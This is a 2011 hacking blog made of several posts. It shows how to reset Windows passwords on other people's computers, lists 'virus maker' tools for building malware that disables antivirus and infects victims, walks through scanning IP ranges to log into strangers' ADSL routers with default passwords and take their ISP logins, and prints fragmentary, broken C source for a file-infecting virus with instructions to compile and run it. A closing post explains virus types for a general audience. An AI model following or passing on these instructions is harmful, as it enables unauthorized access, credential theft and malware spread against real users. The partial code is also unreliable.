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Sunday, 9 October 2011

Hack BSNL Broadband

Hack BSNL Broadband for Speed

If you are a BSNL broadband user, chances are that you are facing frequent DNS issues. Their DNS servers are just unresponsive. The look up takes a long duration and many times just time out. The solution? There is small hack on BSNL for this. Use third party DNS servers instead of BSNL DNS servers or run your own one like djbdns. The easiest options is to use OpenDNS. Just reconfigure your network to use the following DNS servers:
Detailed instructions specific to operating system or your BSNL modem are available in the OpenDNS website itself. After I reconfigured my BSNL modem to use the above 2 IP addresses, my DNS problems just vanished! Other ‘freebies’ that come with OpenDNS are phishing filters and automatic URL correction. Even if your service provider’s DNS servers are working fine, you can still use OpenDNS just for these two special features. After you hack BSNL DNS servers, you will see a noticeable improvement in your broadband speed.
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Administrator Password Hack

How to Hack Windows Administrator Password

This hack will show you how to reset Windows administrator password (for Win 2000, XP, Vista and Win 7) at times when you forget it or when you want to gain access to a computer for which you do not know the password.

Most of us have experienced a situation where in we need to gain access to a computer which is password protected or at times we may forget the administrator password without which it becomes impossible to login to the computer. So here is an excellent hack using which you can reset the password or make the password empty (remove the password) so that you can gain administrator access to the computer. You can do this with a small tool called  Offline NT Password & Registry Editor. This utility works offline, that means you need to shut down your computer and boot off your using a floppy disk, CD or USB device (such as pen drive). The tool has the following features.
  • You do not need to know the old password to set a new one
  • Will detect and offer to unlock locked or disabled out user accounts!
  • There is also a registry editor and other registry utilities that works under linux/unix, and can be used for other things than password editing.

How it works?

Most Windows operating systems stores the login passwords and other encrypted passwords in a file called sam (Security Accounts Manager). This file can be usually found in \windows\system32\config. This file is a part of Windows registry and remains inaccessible as long as the OS is active. Hence it is necessary that you need to boot off your computer and access this sam file via boot. This tool intelligently gains access to this file and will reset/remove the password associated with administrator or any other account.
The download link for both CD and floppy drives along with the complete instructions is given below
It is recommended that you download the CD version of the tool since floppy drive is outdated and doesn’t exist in today’s computer. Once you download you’ll get a bootable image which you need to burn it onto your CD. Now boot your computer from this CD and follow the screen instructions to reset the password.

Another simple way to reset non-administrator account passwords

Here is another simple way through which you can reset the password of any non-administrator accounts. The only requirement for this is that you need to have administrator privileges. Here is a step-by-step instruction to accomplish this task.
1. Open the command prompt (Start->Run->type cmd->Enter)
2. Now type net user and hit Enter
3. Now the system will show you a list of user accounts on the computer. Say for example you need to reset the password of the account by name John, then do as follows
4. Type net user John * and hit Enter. Now the system will ask you to enter the new password for the account. That’s it. Now you’ve successfully reset the password for John without knowing his old password.
So in this way you can reset the password of any Windows account at times when you forget it so that you need not re-install your OS for any reason. I hope this helps.
Popularity: 19% [?]
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Create a Computer Virus

How to Create a Computer Virus

Virus Software: How to make Virus/Create Virus

I have previously posted about How to Create a Fake and Harmless Virus. In this article i want to show you how to create a real virus using Virus Software. I compiled a list of some great virus maker softwares. Now you don't have to know any programming or coding to make virus. Simply use one of these Virus softwares and you can easily make virus for yourself. These virus softwares provides you with various options which you can use to make virus according to your preferences. The virus programs are tested to well working on all Windows systems.

Here is the list of the softwares that allows you to make Virus:

1. In Shadow Batch Virus Generator

1. First of all download the virus maker from here

2. Run "In Shadow Batch Virus Generator.exe" application to see something like this:

3. You can use various options to make virus to suit your needs. You can:
  • Infect files of various extensions
  • Insert virus in startup menu, Kill various processes.
  • Disable all security services like Windows Defender, Antivirus, Firewall.
  • Rename file extensions, spread virus via file sharing.
  • Create new admin account, change user account password.
  • Block various websites, download trojan files to victim computer, shutdown victim computer and much more.

4. After selecting various options, move on to "Creating Options" tab and hit on "Save as Bat". Assign name to the virus and hit on Save.

5. Now, you have your virus ready to hack your victim. This virus maker is undetectable by the most antiviruses.

I am not responsible for any action performed by you. Also, do not try this virus on your own computer. This virus software is one of the most efficient virus software used today.

2. JPS Virus Maker

This is also a great virus maker with many features in it. Check all the features of JPS Virus maker here.

3. TeraBIT Virus Maker

A powerful virus maker for you. Look for updates here

Download JPS Virus Maker and TeraBit Virus Maker.

These two virus makers are detected as a viruses by the most anti-virus softwares, but they won't harm your pc in any way. Before you run these virus makers disable your anti-virus temporarily.

If you know other virus makers i want to hear your suggestions.

Also read:
How to Make a Virus/Trojan Undetectable

Do you have questions, comments, or suggestions? Feel free to post a comment!

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Hack an Ethernet

How to Hack an Ethernet ADSL Router


Almost half of the Internet users across the globe use ADSL routers/modems to connect to the Internet however, most of them are unaware of the fact that it has a serious vulnerability which can easily be exploited even by a noob hacker just like you. In this post I will show you how to exploit a common vulnerability that lies in most ADSL routers so as to gain complete access to the router settings and ISP login details.

Every router comes with a username and password using which it is possible to gain access to the router settings and configure the device. The vulnerability actually lies in theDefault username and password that comes with the factory settings. Usually the routers come preconfigured from the Internet Service provider and hence the users do not bother to change the password later. This makes it possible for the attackers to gain unauthorized access and modify the router settings using a common set of default usernames and passwords. Here is how you can do it.
Before you proceed, you need the following tool in the process
Here is a detailed information on how to exploit the vulnerability of an ADSL router.
Step-1: Go to Once the page is loaded you will find your IP address. Note it down.
Step-2: Open Angry IP Scanner, here you will see an option called IP Range: where you need to enter the range of IP address to scan for.
Suppose your IP is, you can set the range something as117.192.194.0 to so that there exists atleast 200-300 IP addresses in the range.
Step-3: Go to Tools->Preferences and select the Ports tab. Under Port selectionenter 80 (we need to scan for port 80). Now switch to the Display tab, select the option “Hosts with open ports only” and click on OK.
IP Scanner
I have used Angry IP Scanner v3.0 beta-4. If you are using a different version, you need to Go to Options instead of Tools
Step-4: Now click on Start. After a few minutes, the IP scanner will show a list of IPs with Port 80 open as shown in the below image.
IP Scanner
Step-5: Now copy any of the IP from the list, paste it in your browser’s address bar and hit enter. A window will popup asking for username and password. Since most users do not change the passwords, it should most likely work with the default username and password. For most routers the default username-password pair will be admin-admin or admin-password.
Just enter the username-password as specified above and hit enter. If you are lucky you should gain access to the router settings page where you can modify any of the router settings. The settings page can vary from router to router. A sample router settings page is shown below.
Router Settings Page
If you do not succeed to gain access, select another IP from the list and repeat the step-5. Atleast 1 out of 5 IPs will have a default password and hence you will surely be able to gain access.

What can an Attacker do by Gaining Access to the Router Settings?

By gaining access to the router settings, it is possible for an attacker to modify any of the router settings which results in the malfunction of the router. As a result the target user’s computer will be disconnected from the Internet. In the worst case the attacker can copy the ISP login details from the router to steal the Internet connection or play any kind of prank with the router settings. So the victim has to reconfigure the router in order to bring it back to action.

The Verdict:

If you are using an ADSL router to connect to the Internet, it is highly recommended that you immediately change your password to prevent any such attacks in the future. Who knows, you may be the next victim of such an attack. 
Since the configuration varies from router to router, you need to contact your ISP for details on how to change the password for your model.
All the information provided in this post are for educational purposes only. Please do not use this information for illegal purposes.
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Create a Computer Virus?

How to Create a Computer Virus?

This program is an example of how to create a virus in C. This program demonstrates a simple virus program which upon execution (Running) creates a copy of itself in the other file. Thus it destroys other files by infecting them. But the virus infected file is also capable of spreading the infection to another file and so on. Here’s the source code of the virus program.

FILE *virus,*host;
int done,a=0;
unsigned long x;
char buff[2048];
struct ffblk ffblk;
clock_t st,end;
void main()
if(host==NULL) goto next;
printf(“Infecting %s\n”,ffblk.ff_name,a);
printf(“DONE! (Total Files Infected= %d)”,a);
printf(“TIME TAKEN=%f SEC\n”,


1. Load the program in the compiler, press Alt-F9 to compile
3. Note down the size of generated EXE file in bytes (SEE EXE FILE PROPERTIES FOR IT’S SIZE)
4. Change the value of X in the source code with the noted down size (IN THE ABOVE SOURCE CODE x= 89088; CHANGE IT)
5. Once again follow the STEP 1 & STEP 2.Now the generated EXE File is ready to infect
USING BORLAND C++ 5.5 (32-BIT) :
1. Compile once,note down the generated EXE file length in bytes
2. Change the value of X in source code to this length in bytes
3. Recompile it.The new EXE file is ready to infect


1. Open new empty folder
3. Run the virus EXE file there you will see all the files in the current directory get infected.
4. All the infected files will be ready to reinfect
That’s it
Popularity: 17% [?]
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Computer Virus Work

How does a Computer Virus Work

There are millions of viruses present these days, and new viruses originating every day. It is awfully tricky to provide you with a standard explanation of how viruses function, because they all have differences in the manner they infect or the method they spread. Hence, in this article, I have explained it bearing in mind few broad groups that are usually used to illustrate different types of viruses.

File Viruses or Parasitic Viruses

File viruses are pieces of code that attach themselves to executable files, driver files or compressed files, and they are triggered when the host program is executed. Oncethe file virus or parasitic virus is activated, it may spread by attaching to new programs in the system, and also perform out the wicked actions it was programmed for. A large number of file/parasitic viruses spread by loading themselves in the system memory, and they start searching for additional programs located on the drive. If it locates one, it transforms the program’s code so that it encloses the virus code. Then it activates the virus’s code next time it runs. It keeps doing this yet again until it crawls all over the system, and probably to additional systems that share the infected program.
Besides spreading themselves, these viruses also hold various types of destructive elements that can be activated instantly or by a specific ‘trigger’. The triggers could possibly be specific dates, or the number of times the virus has been replicated, or anything equally small.
Examples of file/parasitic viruses are Randex, Meve and MrKlunky.

Boot Sector Viruses

boot sector virus infects the boot sector of a hard drive, which is a very critical component for the booting process. The boot sector is where all the information concerning the drive is stored, along with a program that makes it possible for the operating system to boot up. By introducing the virus code into the boot sector, the virus ensures that it loads into the system memory at each boot cycle.
A boot virus does not infect files; instead, it infects the drive on which they are saved. Possibly this is the reason for their collapse. In earlier days, when the programs were carried around in floppy disks, the virus used to spread like a wild fire. However, with the upcoming of CD drives and CD ROMs, it became impossible for the boot sector virus to infect pre-written information on a CD, which in due course stopped such viruses from spreading and infecting.
Although the boot sector viruses still survive in the computer world, they are very rare compared to the new era’s malicious software. An additional cause why boot sector viruses are not so common is that the new age operating systems guard the boot sector, which makes it hard for the virus to infect it.
Examples of boot sector viruses are Polyboot.B and AntiEXE.

Multipartite Viruses

Multipartite viruses are a mixture of boot sector viruses and file viruses. These viruses enter the system through infected media and dwell in the system memory. They then travel onto the boot sector of the hard drive. From there, the multipartite virus infects the executable files on the hard drive and spreads throughout the system.
There aren’t many multipartite viruses present these days, but in their era, they were responsible for a number of vital troubles due to their ability to combine different infection practices.
A significant example of a multipartite virus is Ywinz.

Macro Viruses

Macro viruses infect files that are formed using certain applications or programs that include macros. Such applications comprises of Microsoft Office documents such as Word documents, Excel spreadsheets, PowerPoint presentations, Access databases and other related application files such as Corel Draw, AmiPro, etc.
As macro viruses are programmed in the language of the application and not in that of the operating system, they are recognized to be platform-independent, i.e. they can spread across operating systems such as Windows, Macintosh or any other systems, as long as they are running the necessary application. With the ever rising abilities of macro languages in applications, and the risk of hazardous infection spreading over the networks, this macro virus has become a critical threat.
The earliest macro virus was programmed for Microsoft Word and was exposed back in August 1995. At present, there are thousands of macro viruses in existence.
Examples of macro viruses are Relax, Melissa.A and Bablas.
Macro Virus
Macro Virus

Network Viruses

A network virus is very much skilled in rapidly spreading across a Local Area Network (LAN) or even over the internet. Generally, it circulates through shared resources, such as shared drives and folders. When it infects a fresh system, it hunts for possible victims by scanning the network for other defenseless systems. When a defenseless system is found, the network virus infects the additional systems and thus spreads over the network.
Examples of some most dangerous viruses are Nimda and SQLStammer.

E-Mail Viruses

An e-mail virus can probably be a type of a macro virus that spreads itself to all the contacts located in the host’s e-mail address book. If any of the e-mail recipients open the attachment of the infected mail, it spreads to the new host’s address bookcontacts, and then proceeds to send itself to all those contacts as well. Nowadays, e-mail viruses can infect hosts even if the infected e-mail is previewed in a mail client. One of the most widespread and destructive e-mail viruses is the ILOVEYOU virus.
There are many methods by which a virus can infect or stay inactive on your computer. However, whether active or inactive, it’s dangerous to let one free on your system, and should be dealt with instantaneously.
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